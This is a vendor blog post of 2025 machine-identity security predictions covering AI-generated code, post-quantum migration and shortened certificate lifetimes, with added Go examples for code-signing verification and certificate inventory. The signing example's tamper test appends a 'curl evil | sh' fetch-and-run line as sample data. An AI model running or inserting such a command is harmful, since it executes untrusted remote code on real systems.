Machine identities are the foundation of security—they ensure secure connections and communications between machines. But for many cybersecurity professionals, securing these critical assets is proving elusive. Machine identities are evolving as fast as, or faster than, other security components. This year alone we have seen radical movement in AI, post-quantum cryptography and certificate lifespans. These disruptive elements, coupled with a burgeoning threat landscape for machine identities, will require a keen focus in the coming year.
To help you prepare for what's ahead, we queried our machine identity security experts for their key predictions for 2025. Here’s what they had to say:
1. We will see our first major AI-generated code vulnerability
Kevin Bocek, Chief Innovation Officer at Venafi, a CyberArk Company
Development teams have adopted GenAI and other AI technologies with gusto, using AI to generate code for the applications we use in our daily lives. The drive for the 10x developer is on. While software development has traditionally relied on multiple sets of eyes on code to make sure it’s secure and meets quality standards, this is starting to get pushed aside with the rise of AI coding. In the year ahead, I predict that we will see some companies get overly confident in AI’s capabilities and complacent about how AI-generated code is used—leading to vulnerable and malicious code making its way into production.
GenAI is amazing, but it is also easy to trick with the right prompts and prone to hallucinations. In the year ahead, companies that do not take these issues seriously will find themselves in hot water—in fact, 78% of security leaders believe AI-developed code will lead to a security reckoning. The CrowdStrike outage this year showed first-hand how quickly code goes from developer to disaster. With code originating from various sources and only expected to increase, it’s vital to authenticate code, applications and workloads based on their identity. With code signing set to become their first line of defense next year, businesses can ensure that code has come from a trusted source, has not changed and is approved for use.
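The three properties the paragraph above assigns to code signing (the code came from a trusted source, it has not changed, and it is approved for use) map onto three checks a verifier performs before an artifact is admitted to production. The following is an added example, written for this page rather than taken from the original post or from any Venafi/CyberArk product; the key ID `build-pipeline-2025`, the in-memory trust store and the sample deploy script are constructed for the demonstration, and a real deployment would take the trusted keys from a trust store or transparency log rather than a map.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
)

// TrustStore maps an approved signer's key ID to its public key. Constructed
// in-memory allowlist; production systems load this from a trust store.
type TrustStore map[string]ed25519.PublicKey

// Attestation travels alongside the artifact: who signed, what digest, the signature.
type Attestation struct {
	KeyID  string
	Digest [32]byte
	Sig    []byte
}

var (
	ErrUntrustedSigner = errors.New("signer key ID is not in the trust store")
	ErrBadSignature    = errors.New("signature does not verify under the claimed key")
	ErrTampered        = errors.New("artifact digest does not match the signed digest")
)

// SignArtifact hashes the artifact and signs the digest with the build key.
func SignArtifact(keyID string, priv ed25519.PrivateKey, artifact []byte) Attestation {
	d := sha256.Sum256(artifact)
	return Attestation{KeyID: keyID, Digest: d, Sig: ed25519.Sign(priv, d[:])}
}

// VerifyArtifact answers, in order: is the signer approved, did that signer
// really sign this digest, and is the artifact in hand the one that was signed.
func VerifyArtifact(ts TrustStore, att Attestation, artifact []byte) error {
	pub, ok := ts[att.KeyID]
	if !ok {
		return ErrUntrustedSigner
	}
	if !ed25519.Verify(pub, att.Digest[:], att.Sig) {
		return ErrBadSignature
	}
	if sha256.Sum256(artifact) != att.Digest {
		return ErrTampered
	}
	return nil
}

// Scenario exercises the happy path plus the three ways admission should fail.
func Scenario() map[string]error {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader)
	_, roguePriv, _ := ed25519.GenerateKey(rand.Reader) // key the trust store has never seen
	ts := TrustStore{"build-pipeline-2025": pub}

	artifact := []byte("#!/bin/sh\necho deploy\n") // constructed sample artifact
	att := SignArtifact("build-pipeline-2025", priv, artifact)

	// Modified after signing (the "has not changed" check).
	modified := append(append([]byte(nil), artifact...), []byte("curl evil | sh\n")...)
	// Signed by a rogue key that claims the trusted key ID (the "trusted source" check).
	forged := SignArtifact("build-pipeline-2025", roguePriv, artifact)
	// Signed by a key ID nobody approved (the "approved for use" check).
	unknown := SignArtifact("laptop-key", roguePriv, artifact)

	return map[string]error{
		"trusted":  VerifyArtifact(ts, att, artifact),
		"tampered": VerifyArtifact(ts, att, modified),
		"forged":   VerifyArtifact(ts, forged, artifact),
		"unknown":  VerifyArtifact(ts, unknown, artifact),
	}
}

func main() {
	for name, err := range Scenario() {
		fmt.Printf("%-9s -> %v\n", name, err)
	}
	d := sha256.Sum256([]byte("#!/bin/sh\necho deploy\n"))
	fmt.Println("artifact digest:", hex.EncodeToString(d[:]))
}
```

The signature is verified against the digest carried in the attestation before the artifact's own digest is compared to it, so a forged attestation cannot smuggle in a new digest, and the trust-store lookup happens first so an unknown key ID is rejected without any cryptographic work. Note that all four checks are against the artifact as deployed: if code is re-signed by the pipeline after an AI-assisted change, this proves provenance of the build, not that the change was reviewed.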
Additional statistics to support this prediction:
Eighty-three percent of security leaders say their developers currently use AI to generate code, with 57% saying it has become common practice. However, 72% feel they have no choice but to allow developers to use AI to remain competitive, and 63% have considered banning the use of AI in coding due to the security risks.
2. AI will widen the attack surface as adversaries target model theft and poisoning attacks
Shivajee Samdarshi, Chief Product Officer at Venafi, a CyberArk Company
In 2025, attackers will turn their eye to AI poisoning attacks and model theft, as they seek out new ways to target companies. Large Language Models (LLMs) are by nature dependent on huge data repositories, making them potentially potent targets for attackers.
As companies continue to invest in generative AI, even developing their own LLMs, attackers will start to look for ways to compromise these new environments. One method is through poisoning attacks. By targeting ingress and egress data pipelines, we will see attackers manipulating data to poison AI models and the outputs they produce. Even minor tweaks to an AI model’s training data can trigger significant chaos once the model is deployed in production and starts acting autonomously.
There is also a risk that attackers will try to steal the models themselves, taking with them huge swathes of IP and R&D. As such, the focus for next year will shift from using GenAI safely to protecting the models themselves from manipulation and theft. This will put greater emphasis on the need for identity, authentication and authorization to ensure that both the models and the systems they access are protected.
3. Quantum preparedness becomes the #1 board-level cybersecurity topic
Kevin Bocek, Chief Innovation Officer at Venafi, a CyberArk Company
Boards are already peppering CISOs with questions about companies’ quantum preparedness and migration strategies. Articles in business-level publications and beyond are raising questions and concerns. In 2025, post-quantum readiness will become boards’ hottest cybersecurity topic. This is a generational change in cybersecurity, not simply a Y2K-style event; it will sit at the top of boards’ cybersecurity lists and be with us for many years ahead.
Over the past year, significant advancements in quantum technology have already raised concerns about data security. As we approach the point where quantum computers could potentially break current encryption methods, it’s crucial for companies to develop their quantum readiness plans. Boards understand that this has the potential to crush businesses, as organizations wouldn’t be able to function in a digital world where it’s impossible to establish what is friend or foe.
The challenge in 2025 will be understanding where machine identities—authentication keys and certificates that facilitate secure machine-to-machine communication—are being utilized. This is the first step in post-quantum readiness that will lead to the ability to shift to new quantum-resistant machine identities. Larger organizations will have thousands, or even hundreds of thousands, of identities that need to be replaced with new quantum-proof identities. Research found 64% of security leaders say they “dread the day” the board asks about their migration plans and 67% think the shift to post-quantum cryptography will be a nightmare, as they don’t know where all their keys and certificates are.
Given this uncertainty, the journey to becoming quantum-proof must start now. In the coming year, companies will start replacing untrusted certificate authorities (CAs) as part of their transition to quantum-resilient systems. Fortunately, the necessary platforms to facilitate this transition are already available. Security teams can utilize integrated solutions such as certificate lifecycle management (CLM), PKI-as-a-service and workload identity issuers from a unified control plane. This streamlined approach will not only aid in securing machine identities but also lay a strong foundation for a successful migration to a post-quantum future.
4. 90-day certificates will cause tsunami-sized waves of certificate-related outages
Kevin Bocek, Chief Innovation Officer at Venafi, a CyberArk Company
2025 will see a spike in outages due to a rise in expired certificates, as new mandates around certificate lifespans come into effect. In 2023, Google announced its intention to mandate the use of 90-day certificates within Chrome. Apple has now taken the driver’s seat and has published a draft ballot on GitHub for comment, proposing to shorten certificate lifespans to just 45 days by 2027. Either Google or Apple can take action on their own—as they have in the past—and certificate authorities (CAs) will have to comply. Ultimately this means security teams have to prepare now for an onslaught of developers and application owners needing help with tsunami-sized waves of certificate expirations and outages.
The tide has turned against the current 398-day lifespans—and with good reason. Shorter certificate lifecycles make it harder for attackers to misuse TLS identities, so this is a necessary step to ensure the continued security and trust in our online world.
However, transitioning from renewing certificates every 398 days down to every 90 or 45 days will not be easy sailing. It creates a bigger burden for organizations, which will have to replace certificates up to nine times more often. Each of these certificates is a potential single point of failure if not properly managed and secured. We are going to see disruption. We are going to see outages. And we are going to see security incidents.
What’s required is for security teams to have: a) observability over certificates, b) intelligence to know what’s at risk and c) automation to take errors and mistakes out of the entire handling of TLS certificates. None of these steps can be overlooked. For example, we’ve seen large outages with Microsoft Azure happen because a certificate was renewed but not installed. Complete observability not just for one day, but 24/7, is required. This is just one of the building blocks security teams need as part of their machine identity security program.
And companies are already struggling. In the past 12 months alone, 83% of organizations have been hit by certificate-related outages. Security leaders are already worried. Three quarters (74%) say that Google’s plans will cause chaos and 77% think more outages are ‘inevitable’—with 81% saying it will amplify existing challenges they have around managing certificates.
Ultimately though, companies will emerge from 2025 with a stronger and more resilient foundation of security. Most important is building a machine identity security program. We will see mass adoption of automation, with companies deploying control planes to manage and secure their machine identities, like TLS. This will help to raise the bar for internet security as a whole—while making certificate-related outages a thing of the past.
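Two passages above describe the same inventory work from different angles: prediction 3 says the first step of post-quantum readiness is knowing where keys and certificates are used and which algorithms they carry, and prediction 4 says outages come from certificates that expire unnoticed or, as in the Azure case mentioned, are renewed but never installed. The following is an added example, written for this page and not taken from the original post or from any Venafi/CyberArk product, that runs those checks over parsed X.509 certificates. The hosts, the 90- and 398-day lifetimes, the reference date and the self-signed certificates are all constructed so the example runs offline; a real scan would read PEM files or the leaf certificate presented during a TLS handshake, and the one-third-of-lifetime renewal window is an assumption borrowed from common ACME client practice, not a figure from the page.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/hex"
	"fmt"
	"math/big"
	"time"
)

// Finding is one inventory row: what is deployed on a host and why it is at risk.
type Finding struct {
	Host      string
	Algo      string        // public key algorithm of the served certificate
	Lifetime  time.Duration // NotAfter - NotBefore of the served certificate
	Remaining time.Duration // NotAfter - now of the served certificate
	Issues    []string
}

// Has reports whether a finding carries an issue with the given tag prefix.
func Has(f Finding, tag string) bool {
	for _, i := range f.Issues {
		if len(i) >= len(tag) && i[:len(tag)] == tag {
			return true
		}
	}
	return false
}

func fingerprint(c *x509.Certificate) string {
	s := sha256.Sum256(c.Raw)
	return hex.EncodeToString(s[:])
}

// Assess compares what the CLM system issued with what the endpoint actually serves.
// Renewal is flagged at one third of lifetime remaining (assumed window), so the
// alarm scales from 398-day down to 90- or 45-day certificates without retuning.
func Assess(host string, issued, served *x509.Certificate, now time.Time) Finding {
	f := Finding{Host: host, Algo: served.PublicKeyAlgorithm.String()}
	f.Lifetime = served.NotAfter.Sub(served.NotBefore)
	f.Remaining = served.NotAfter.Sub(now)
	switch served.PublicKeyAlgorithm {
	case x509.RSA, x509.ECDSA, x509.Ed25519:
		f.Issues = append(f.Issues, "classical-key: needs a quantum-resistant replacement plan")
	}
	if f.Remaining <= 0 {
		f.Issues = append(f.Issues, "expired: served certificate is past NotAfter")
	} else if f.Remaining < f.Lifetime/3 {
		f.Issues = append(f.Issues, "renewal-due: under one third of lifetime remains")
	}
	if fingerprint(issued) != fingerprint(served) {
		f.Issues = append(f.Issues, "not-installed: issued certificate differs from served one")
	}
	return f
}

// selfSigned mints a throwaway ECDSA certificate so the example needs no CA.
func selfSigned(cn string, notBefore time.Time, lifetime time.Duration, serial int64) *x509.Certificate {
	priv, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(serial),
		Subject:      pkix.Name{CommonName: cn},
		DNSNames:     []string{cn},
		NotBefore:    notBefore,
		NotAfter:     notBefore.Add(lifetime),
		KeyUsage:     x509.KeyUsageDigitalSignature,
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &priv.PublicKey, priv)
	if err != nil {
		panic(err)
	}
	cert, err := x509.ParseCertificate(der)
	if err != nil {
		panic(err)
	}
	return cert
}

// Scenario is a constructed three-host inventory evaluated at a fixed date.
func Scenario() map[string]Finding {
	now := time.Date(2025, 3, 1, 0, 0, 0, 0, time.UTC)
	day := 24 * time.Hour
	apiNew := selfSigned("api.example.test", now.Add(-1*day), 90*day, 1)      // renewed and installed
	webOld := selfSigned("web.example.test", now.Add(-80*day), 90*day, 2)     // still served
	webNew := selfSigned("web.example.test", now.Add(-1*day), 90*day, 3)      // issued, never installed
	legacy := selfSigned("legacy.example.test", now.Add(-378*day), 398*day, 4) // 20 days left
	return map[string]Finding{
		"api":    Assess("api.example.test", apiNew, apiNew, now),
		"web":    Assess("web.example.test", webNew, webOld, now),
		"legacy": Assess("legacy.example.test", legacy, legacy, now),
	}
}

func main() {
	for _, f := range Scenario() {
		fmt.Printf("%-20s %-5s lifetime=%3.0fd remaining=%3.0fd %v\n",
			f.Host, f.Algo, f.Lifetime.Hours()/24, f.Remaining.Hours()/24, f.Issues)
	}
}
```

The renewed-but-not-installed case is caught purely by comparing the SHA-256 fingerprint of the certificate the CLM system issued with the one the endpoint presents, which is why the observability the text asks for has to include the live endpoint and not only the issuance record. The classical-key flag fires for every certificate here, which is the honest picture today: the inventory's job is to make the scope of the post-quantum migration countable, not to find certificates that are already safe.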
5. Attackers will target cloud native environments to disrupt critical company systems and shut down core services
Sitaram Iyer, VP of Emerging Technologies at Venafi, a CyberArk Company
As businesses rapidly adopt cloud native technologies like Kubernetes and service mesh, they often overlook specific security risks that make these environments appealing targets for attackers. In the coming year, cloud native and developer environments will become even bigger targets due to the surge in machine identities—like cloud access tokens, API keys and service accounts.
Machines—from IoT devices to servers, and even the workloads that run on them—all require unique identities that, like human credentials, can be hacked to expose critical information. Machine identities now outnumber human identities by 45 to 1, and this gap is expected to widen, set to reach 100 to 1 soon. The risk of exploitation grows if these identities aren’t consistently protected across environments—giving attackers more opportunities to exploit weak points.
For instance, compromising a single service account—which relies on machine identities—can grant direct entry into sensitive resources, often with privileged access that allows attackers to move laterally across cloud infrastructures. As we move into next year, this ability to exploit machine identities for unauthorized access will drive adversaries to focus more intently on cloud native environments. Successfully targeting machine identities gives attackers a clear pathway to admin-level control, that can enable everything from data theft to taking over – or shutting down – critical business services.
6. Hardware will become cool—again—as AI, cloud costs and IP considerations drive a re-assessment of on-premises workloads
Matt Barker, VP & Global Head of Workload Identity Architecture at Venafi, a CyberArk Company
Let’s face it, the cost of running an application keeps rising. There are now so many layers in the stack that cost of goods sold (COGS) is inflating and margins are being squeezed. This leads people to question whether there’s a cheaper way of doing it.
At the same time, AI is hungry for resources, costly as a service and for the most valuable use cases requires ultra-low latency. On top of this, companies are becoming more acutely aware of the value of their data, both in the context of AI inference and their need to protect it from attack.
It’s thanks to a combination of these factors that, for the first time in a while, we are seeing a renewed interest in hardware. Engineers drool over Oxide and Civo racks, and many buyers of hardware—from the likes of Dell to NVIDIA—are starting to question which software stacks ‘come with their GPUs’ out of the box.
This growing trend will also lead to knock-on effects, including more dispersion of compute. As this happens, it will put yet more pressure on the need to implement consistent security frameworks and authentication methods to ensure both cloud-based security and data centres provide the same level of protection and control.
7. Machine Identity Security teams will become the norm for forward-thinking enterprises in 2025
Kevin Bocek, Chief Innovation Officer at Venafi, a CyberArk Company
Next year, machine identity security will emerge as its own defined category, rather than being lumped into broader identity programs. CISOs now understand that separate human and machine identity programs are required, and people and organizations will change accordingly.
This shift is being driven by several factors. Attackers are increasingly zeroing in on machine identities, particularly in cloud native and development environments. For instance, groups such as IntelBroker recently claimed to be selling stolen machine identities and developer assets from both Cisco and Nokia. Meanwhile, the rapid adoption of cloud-native technologies and AI is fueling the growing complexity and speed at which identities like TLS and SPIFFE are being created and deployed to critical systems.
At the same time, the machine identity landscape is shifting. Shortening lifecycles for machine identities are making management more demanding, while the rise of quantum encryption is pushing organizations to consider their post-quantum readiness. Compounding the challenge is sheer volume: machine identities now outnumber human identities by 45 to 1. And this gap is expected to widen, set to reach 100 to 1 soon.
To manage these changes, forward-looking companies have already formalized their response by creating dedicated Machine Identity Security programs. As these challenges become more acute, we will see more companies follow suit to develop comprehensive, automated Machine Identity Security programs to better position themselves to get ahead of the challenges of today and tomorrow. Those that don’t will witness daily outages and security incidents as the machine identity landscape becomes more turbulent.